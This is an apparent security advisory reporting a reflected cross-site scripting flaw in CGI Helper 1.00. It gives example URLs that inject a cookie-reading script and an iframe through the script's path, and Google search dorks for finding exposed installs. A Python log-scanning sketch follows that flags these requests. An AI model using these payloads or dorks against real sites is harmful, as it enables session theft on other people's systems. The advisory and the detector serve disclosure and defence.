CGI Helper version 1.00 suffers from a cross-site scripting vulnerability.
## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>><script>alert(document.cookie)</script>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>><script>alert(document.cookie)</script>
The same injection point can be used to make the script render infinite iframes, which can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>><iframe src=http://www.google.com.br>
or
http://www.site.com/cgi-bin/cgihelper.pl/>><iframe src=http://www.google.com.br>
Google dork:
inurl:cgihelper.pl
inurl:cgi-bin/helper.cgi
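
Detection sketch for the requests shown above, as an added example that is not part of the original advisory or of CGI Helper: it scans web server access log lines for requests to helper.cgi or cgihelper.pl whose extra path (PATH_INFO) decodes to HTML markup. The combined log format, the function names and the sample log lines are assumptions constructed for illustration; only the script names and the appended markup come from the advisory.

```python
import re
from urllib.parse import unquote

# Script names from the advisory; anything after the script name is PATH_INFO.
SCRIPT_RE = re.compile(
    r"/cgi-bin/(?:helper\.cgi|cgihelper\.pl)(?P<extra>/.*)?$", re.I | re.S)
# Request line of a common/combined log entry (assumed format); the target
# may contain raw spaces if the client did not percent-encode the payload.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
# Characters that should never appear in PATH_INFO for this script.
MARKUP_RE = re.compile(r"[<>\"']")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(log_line):
    """Return the decoded PATH_INFO if it carries markup, else None."""
    req = REQUEST_RE.search(log_line)
    if not req:
        return None
    # Drop the query string first, then decode the path part only.
    path = fully_decode(req.group("target").split("?", 1)[0])
    hit = SCRIPT_RE.search(path)
    if not hit or not hit.group("extra"):
        return None
    extra = hit.group("extra")
    return extra if MARKUP_RE.search(extra) else None

def scan(lines):
    """Return (line_number, decoded PATH_INFO) for every flagged line."""
    hits = ((n, suspicious_path_info(l)) for n, l in enumerate(lines, 1))
    return [(n, extra) for n, extra in hits if extra]

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/helper.cgi HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/helper.cgi/%3E%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/cgihelper.pl/%253E%253E%253Ciframe%2520src=http://www.google.com.br%253E HTTP/1.1" 200 655',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/helper.cgi/docs/index HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line_no, extra in scan(SAMPLE_LOG):
        print(f"line {line_no}: markup in PATH_INFO: {extra!r}")
```

A hit means the request was made, not that the markup was reflected; confirm against the response body or fix the script so PATH_INFO is HTML-escaped before output.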